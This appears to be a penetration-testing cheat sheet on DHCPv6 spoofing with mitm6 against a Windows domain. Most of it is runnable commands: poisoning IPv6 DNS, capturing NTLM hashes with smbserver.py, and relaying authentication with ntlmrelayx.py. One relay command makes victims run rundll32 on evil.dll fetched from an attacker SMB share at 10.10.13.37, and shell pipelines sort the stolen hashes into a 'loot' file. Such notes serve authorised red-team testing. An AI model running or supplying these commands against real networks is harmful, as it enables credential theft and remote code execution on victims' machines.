# DHCPv6 Spoofing

* <https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html>

## mitm6

* <https://github.com/fox-it/mitm6>
* <https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/>
* <https://intrinium.com/mitm6-pen-testing/>

Install:

```
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install
Or
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"
```

Generate a list of targets for NTLM relay and prepare a C2 listener and stager:

```
$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt
```

Start SMB server to capture NTLM hashes and serve the stager:

```
$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out
```

Get ready to relay authentication and try executing a command:

```
$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server
```

Start MitMing:

```
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn
```

Parse, sort and save NTLM hashes:

```
# Users
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6

# Machines
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1
```

### Attack vectors

Grab hashes with `smbserver.py` (passive):

1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network.
2. Victims start to use attacker's machine as the primary DNS server.
3. `mitm6.py` on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries.
4. `smbserver.py` collects hashes during SMB requests from victims.

Relay authentication with ntlmrelayx.py (active):

1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network.
2. Victims start to use attacker's machine as the primary DNS server.
3. `mitm6.py` on the attacker's machine acts like a rogue DNS server, `ntlmrelayx.py` serves a custom WPAD file with an inexistent hostname (which will be resolved to the attacker's IP anyway) and acts like a rogue proxy server and `mitm6.py` responds with the attacker's IP for all the incoming DNS queries.
4. Victims grab the WPAD file and ask the rogue IPv6 DNS server (attacker's machine) to resolve its location - resolved to attacker's machine.
5. Victims go to the rogue proxy server and there `ntlmrelayx.py` responses with `HTTP 407 Proxy Authentication`.